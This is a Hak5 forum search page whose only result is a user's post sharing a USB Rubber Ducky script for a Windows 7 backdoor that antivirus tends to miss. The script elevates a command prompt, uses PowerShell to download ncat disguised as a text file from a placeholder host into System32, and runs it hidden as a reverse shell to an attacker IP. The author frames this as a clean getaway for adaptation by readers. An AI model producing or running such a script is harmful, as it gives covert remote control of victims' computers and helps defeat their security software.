Jump to content

Search the Community

Showing results for tags 'av undetected'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 1 result

  1. Just picked up my rubber ducky and thought i'd contribute a bit. (First post btw , Hi!) So we all know that netcat gets picked up by most anti-virus (ratio of about 23/53 ratio) which makes using it as a backdoor slightly challenging. After doing some reading , I figured out that ncat (by nmap) , a moderized version of ncat only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs. So here is a (relatively) undetected backdoor to any windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all. For this attack , we download a copy of ncat on the victims machine and run it silently. You can pick up a portable exe of ncat straight from the developers website (1.5 mb) here. ncat , unlike netcat doesn't run in the background like netcat does (requires a cmd to be open to keep the connection alive) so I used so crafty powershell arguments to force it into the background. The rest is explained in the comments. You can compare the AV results between netcat and ncat here: VirusTotal ncat results (Picked up by norton though , sucks i know) VirusTotal netcat results Please feel free to adapt this for your own tailored needs, be it persistence , no-download (twin-duck) or hidden cmd window. - GrimsouL REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014 REM //This delay required on my PC before attempting to get start menu , may not be required on yours/target. DELAY 1000 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU REM //This dely is long because in my machine right clicking certain things takes a long time (many menu options) , adjust as needed. DELAY 1000 STRING a DELAY 200 REM //This enter required for my PC, i've seen alot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine , hence we need an enter to actually 'click' it ENTER REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming DELAY 700 LEFTARROW DELAY 400 ENTER DELAY 700 REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters dont allow .exe files. So we change the extension of ncat to a .txt and upload it then rename it back to an exe after download STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe') ENTER REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/targets connection speed.(ncat = 1.58MB) DELAY 10000 ENTER REM //Where the magic happens , we run the downloaded ncat exe , since ncat doesn't run in the background , we use a powershell argument to make it so. STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe' ENTER REM // We exit our powershell , however ncat runs silently leaving us with a clean getaway STRING exit ENTER To run our listener on the attacker machine
  • Create New...